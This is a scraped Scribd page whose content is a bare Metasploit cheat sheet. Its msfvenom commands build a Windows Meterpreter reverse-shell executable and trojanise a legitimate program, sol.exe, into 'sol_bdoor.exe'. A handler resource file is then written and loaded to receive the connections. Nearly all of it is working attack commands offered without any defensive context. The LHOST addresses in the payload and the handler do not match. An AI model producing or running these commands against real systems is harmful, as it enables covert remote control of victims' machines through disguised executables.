0% found this document useful (0 votes)
146 views

Meterpreter

The document contains commands to generate Metasploit payloads that will establish reverse TCP connections back to the attacker's machine. It creates executable files called Meterpreter.exe and sol_bdoor.exe using msfvenom to embed the Metasploit payload. It also creates a Metasploit handler configuration file and loads it to listen for the reverse TCP connections.

Uploaded by

Ismim Fismim
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
146 views

Meterpreter

The document contains commands to generate Metasploit payloads that will establish reverse TCP connections back to the attacker's machine. It creates executable files called Meterpreter.exe and sol_bdoor.exe using msfvenom to embed the Metasploit payload. It also creates a Metasploit handler configuration file and loads it to listen for the reverse TCP connections.

Uploaded by

Ismim Fismim
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 1

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192

.168.1.101 -b "\x00" -f exe -o Meterpreter.exe


msfvenom -a x86 --platform windows -x sol.exe -k -p windows/messagebox LHOST=192
.168.1.101 -b "\x00" -f exe -o sol_bdoor.exe
msfvenom -a x86 --platform windows -x sol.exe -k -p windows/meterpreter/reverse_
tcp LHOST=192.168.1.101 -b "\x00" -f exe -o sol_bdoor.exe

root@kali:~#
root@kali:~#
root@kali:~#
root@kali:~#
root@kali:~#
root@kali:~#

touch meterpreter.rc
echo use exploit/multi/handler >> meterpreter.rc
echo set PAYLOAD windows/meterpreter/reverse_tcp >> meterpreter.rc
echo set LHOST 192.168.1.184 >> meterpreter.rc
echo set ExitOnSession false >> meterpreter.rc
echo exploit -j -z >> meterpreter.rc

root@kali:~# msfconsole -r meterpreter.rc

You might also like